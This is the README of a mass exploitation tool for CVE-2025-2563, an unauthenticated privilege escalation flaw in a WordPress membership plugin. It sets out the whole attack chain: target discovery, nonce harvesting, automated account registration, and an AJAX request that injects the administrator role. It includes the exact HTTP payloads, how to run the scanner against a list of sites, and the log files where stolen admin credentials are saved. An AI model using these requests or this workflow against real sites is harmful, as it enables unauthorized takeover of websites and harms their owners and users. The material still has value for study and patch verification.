Exploit for CVE-2025-2563

## https://sploitus.com/exploit?id=ACF85111-96A2-5629-8D81-7440CC4E0D7F
# CVE-2025-2563
The User Registration & Membership WordPress plugin before 4.1.2 does not prevent users to set their account role when the Membership Addon is enabled, leading to a privilege escalation issue and allowing unauthenticated users to gain admin privileges

  



  
  
  
  
  
  
  
  


---

## 🔴 Vulnerability Overview

### CVE-2025-2563 — Unauthenticated Privilege Escalation via Membership Addon Role Injection

| Field | Details |
|---|---|
| **CVE ID** | CVE-2025-2563 |
| **Severity** | **HIGH** — CVSS v3.1 Score: **8.1** |
| **Vector** | `CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H` |
| **ADP** | CISA-ADP |
| **Affected Software** | User Registration & Membership Plugin for WordPress |
| **Affected Versions** | All versions **before 4.1.2** |
| **Vulnerability Type** | Improper Privilege Management — Unauthenticated Administrator Account Creation |
| **Authentication Required** | **None** |
| **CWE** | CWE-269: Improper Privilege Management |

**Description:**  
The **User Registration & Membership** plugin for WordPress versions before **4.1.2** fails to enforce server-side role restrictions when the **Membership Addon** is enabled. During the membership registration process, the plugin accepts a user-supplied `role` field within the `user_registration_membership_register_member` AJAX action without validating it against a server-side allowlist. A completely unauthenticated remote attacker can submit a crafted two-step AJAX chain — first registering a new user account via `user_registration_user_form_submit`, then injecting `"role": "administrator"` into the `members_data` payload of the membership call — to silently create a fully privileged WordPress **Administrator** account. This results in complete site compromise with no authentication or user interaction required.

---

## 🛠️ Tool Description

This is a **Proof-of-Concept (PoC) mass exploitation scanner** targeting WordPress installations running a vulnerable version of the **User Registration & Membership** plugin with the Membership Addon active. The tool performs intelligent multi-stage exploitation with automatic discovery, nonce harvesting, combo-based registration, role injection, and admin verification.

### 🔗 Full Attack Chain

```
[Phase 1 — Discovery]
  GET /membership-pricing/        →  Extract membership_id, pricing links
  GET /membership-registration/   →  Extract form_id, nonces, security tokens
  GET /registration/              →  Fallback registration page

          ↓

[Phase 2 — Nonce Extraction]
  Parse: ur_membership_frontend_localized_data._nonce
  Parse: ur_frontend_form_nonce, security, form_id, membership_id

          ↓

[Phase 3 — Registration (Combo Attack)]
  POST /wp-admin/admin-ajax.php
  action=user_registration_user_form_submit
  form_data=[{user_login, user_email, user_pass, membership_field, ...}]
  security=  |  ur_frontend_form_nonce=
  → Try all valid combos until success=true

          ↓

[Phase 4 — Role Injection (CVE-2025-2563)]
  POST /wp-admin/admin-ajax.php
  action=user_registration_membership_register_member
  members_data={"role":"administrator","membership":"",...}
  _wpnonce=
  → Server assigns administrator role to newly created user

          ↓

[Phase 5 — Admin Verification]
  POST /wp-login.php              →  Login with new credentials
  GET  /wp-admin/                 →  Check adminmenu / wp-admin-bar
  GET  /wp-admin/users.php        →  Confirm manage_options access
  GET  /wp-admin/plugin-install.php →  Confirm plugin-install access

          ↓

[Save to Nx_admin.txt]
  Format: [timestamp] https://target.com/wp-login.php user: pass:
```

---

## 📋 Requirements

### System Requirements
- Python **3.8** or higher
- Linux / Windows / macOS

### Python Dependencies

```bash
pip install requests urllib3 rich
```

Or via requirements file:

```bash
pip install -r requirements.txt
```

**`requirements.txt`:**
```
requests>=2.28.0
urllib3>=1.26.0
rich>=13.0.0
```

---

## 🚀 Installation

```bash
# Clone the repository
git clone https://github.com/Nxploited/CVE-2025-2563.git
cd CVE-2025-2563

# Install dependencies
pip install -r requirements.txt

# Run the tool
python3 CVE-2025-2563.py
```

---

## ⚙️ Usage

### Basic Run

```bash
python3 CVE-2025-2563.py
```

The tool uses a fully interactive terminal interface powered by **Rich**.

---

### 🗂️ Target List Format

Create a plain text file (default: `list.txt`) — one target per line:

```
https://target1.com
https://target2.com
http://target3.com
target4.com
```

> Targets without `http://` or `https://` are automatically prefixed with `https://`.

---

### 🖥️ Interactive Prompts

```
Targets file [list.txt]:                    list.txt
Threads [3]:                                5
HTTP timeout (seconds) [10]:                10
Max registration attempts per target [20]:  20
```

> **Password** is fixed internally as `Nx_adminSA` for all registration attempts.

---

## 🔬 Exploitation Deep Dive

### Step 1 — Multi-Page Discovery

The tool probes three pages automatically per target:

| Page | Purpose |
|---|---|
| `/membership-pricing/` | Extract `membership_id` and registration links |
| `/membership-registration/` | Extract form tokens, nonces, and field IDs |
| `/membership-registration/?membership_id=` | Plan-specific form extraction |
| `/registration/` | Fallback generic registration page |

---

### Step 2 — Token Extraction

The following tokens are extracted from raw HTML and inline JavaScript:

| Token | Source |
|---|---|
| `_nonce` | `ur_membership_frontend_localized_data` JS object |
| `ur_frontend_form_nonce` | Hidden input field or JS object |
| `security` | `user_registration_params.user_registration_form_data_save` |
| `form_id` | Hidden input `ur-user-form-id` or JS object |
| `membership_id` | Radio input `urm_membership` or URL query string |

---

### Step 3 — Registration AJAX (Combo Attack)

```http
POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

action=user_registration_user_form_submit
&security=
&form_data=[{"field_name":"user_login","value":"Nxploited_482",...},
            {"field_name":"membership_field_1771350090","value":"","field_type":"radio"}]
&form_id=
&ur_frontend_form_nonce=
&is_membership_active=
&membership_type=
```

The tool automatically iterates over all discovered combinations of `security`, `frontend_nonce`, `form_id`, and `membership_id` until a `success: true` response is received.

---

### Step 4 — Role Injection AJAX (The Vulnerable Call)

```http
POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

action=user_registration_membership_register_member
&_wpnonce=
&members_data={"membership":"","payment_method":"free",
               "role":"administrator","username":"Nxploited_482",...}
&form_response={"username":"Nxploited_482","registration_type":"membership"}
```

> ⚠️ The server accepts the `role` field without any allowlist — this is the root cause of CVE-2025-2563.

---

## 📁 Output Files

| File | Description |
|---|---|
| `reg.txt` | All successful registration attempts with credentials |
| `Nx_admin.txt` | All confirmed administrator escalations |

### ✅ Output Format

**`reg.txt`:**
```
[2025-06-01 12:44:10] https://target.com/wp-login.php user:Nxploited_482 email:Nxploited_482@admin.sa pass:Nx_adminSA
```

**`Nx_admin.txt`:**
```
[2025-06-01 12:44:18] https://target.com/wp-login.php user:Nxploited_482 pass:Nx_adminSA
```

---

## 🖥️ Terminal Output Sample

```
╔══════════════════════════════════════════════════════════════════╗
║  User Registration Membership Full Chain                         ║
║  By: Nxploited  |  GitHub: github.com/Nxploited  |  @Kxploit    ║
╚══════════════════════════════════════════════════════════════════╝

[SCANNING]      https://target.com
[EXPLOITING]    https://target.com  |  nonce + reg OK
[EXPLOITED]     https://target.com  |  password: Nx_adminSA

┌──────────────────────────────────────────────────────────────────────────┐
│ Target               │ Status                       │ Password / Note    │
├──────────────────────────────────────────────────────────────────────────┤
│ https://target.com   │ ✅ COMPROMISED (exploited)   │ password: Nx_adminSA│
│ https://target2.com  │ VULNERABLE (nonce exposed)   │                    │
│ https://target3.com  │ DEAD (connection error)      │                    │
└──────────────────────────────────────────────────────────────────────────┘

Registration log:   reg.txt
Exploit (admin) log: Nx_admin.txt
```

---

## 📊 Status Codes Reference

| Status | Color | Meaning |
|---|---|---|
| `COMPROMISED (exploited)` | 🟢 Green | Full chain success — admin login verified |
| `COMPROMISED (exploit ok, admin not verified)` | 🟡 Yellow | Role injection succeeded but admin panel check inconclusive |
| `VULNERABLE (nonce exposed, registration failed)` | 🟡 Yellow | Membership nonce found but registration AJAX failed |
| `VULNERABLE (nonce exposed, exploit pending)` | 🟡 Yellow | Nonce found but exploitation could not be completed |
| `EXPLOITING` | 🟡 Yellow | Active exploitation in progress |
| `REGISTERED (no membership nonce)` | 🟡 Yellow | Registration succeeded but nonce not extractable |
| `NO REG (all attempts failed)` | ⚫ Dark | All security/nonce/form_id combo attempts exhausted |
| `NO REG (max attempts reached)` | ⚫ Dark | Hit the configured attempt cap |
| `DEAD (no membership/registration pages)` | ⚫ Dark | Plugin not detected on target |
| `EXPLOIT FAILED (request error)` | 🔴 Red | Network error during role injection call |
| `EXPLOIT FAILED (success=false)` | 🔴 Red | Server returned `success: false` on role injection |
| `TIMEOUT` | ⚫ Dark | HTTP timeout |
| `DEAD (connection error)` | ⚫ Dark | Connection refused / unreachable |
| `ERROR` | 🔴 Red | Unexpected exception |

---

## 📡 Contact & Author


  By: Nxploited (Khaled Alenazi)
  
    
  
   
  
    
  


---

## ⚠️ Legal Disclaimer

> **THIS TOOL IS PROVIDED FOR EDUCATIONAL AND AUTHORIZED SECURITY RESEARCH PURPOSES ONLY.**
>
> The author, **Nxploited (Khaled Alenazi)**, and all contributors to this project **do not condone, support, or take any responsibility** for the misuse of this tool or any damage caused by the use of this software against systems for which you do not have explicit written authorization.
>
> - ✅ **Permitted:** Use on systems you own or have been granted **explicit written permission** to test.
> - ❌ **Prohibited:** Use against any systems without prior explicit written authorization from the system owner.
>
> **Unauthorized access to computer systems is illegal and punishable under applicable laws** including but not limited to the Computer Fraud and Abuse Act (CFAA), the Computer Misuse Act (CMA), and equivalent legislation worldwide.
>
> **By using this tool, you accept sole and full responsibility for your actions and confirm that you have the legal authority to test the targeted systems.**
>
> The author assumes **no liability** whatsoever for any direct, indirect, incidental, or consequential damages arising from the use or misuse of this software.

---


  © 2025 Nxploited (Khaled Alenazi) — For authorized security research only.